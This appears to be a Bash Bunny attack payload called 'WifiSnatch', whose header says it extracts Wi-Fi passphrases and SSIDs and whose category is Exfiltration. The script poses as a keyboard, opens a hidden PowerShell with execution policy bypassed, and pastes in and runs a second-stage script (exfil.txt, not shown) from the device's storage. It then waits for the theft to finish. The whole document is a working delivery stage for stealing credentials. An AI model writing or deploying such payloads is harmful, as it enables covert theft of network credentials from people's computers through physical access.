57 lines
880 B
Bash
57 lines
880 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: WifiSnatch
|
|
# Description: Extract wifi information, such as passphrases & SSIDs
|
|
# Author: 0iphor13
|
|
# Version: 1.1
|
|
# Category: Exfiltration
|
|
# Attackmodes: HID, Storage
|
|
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
DUCKY_LANG de
|
|
|
|
rm /root/udisk/DONE
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
|
|
|
LED STAGE1
|
|
|
|
Q DELAY 1500
|
|
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
|
|
Q DELAY 500
|
|
Q ENTER
|
|
|
|
Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
|
|
Q DELAY 2000
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
Q CONTROL v
|
|
Q DELAY 1000
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
|
|
LED STAGE2
|
|
|
|
until [ -f /root/udisk/DONE ]
|
|
do
|
|
sleep 0.2
|
|
done
|
|
|
|
LED CLEANUP
|
|
|
|
rm /root/udisk/DONE
|
|
|
|
Q DELAY 100
|
|
|
|
sync
|
|
|
|
Q DELAY 100
|
|
|
|
LED FINISH
|
|
|
|
#SAVE TO EJECT
|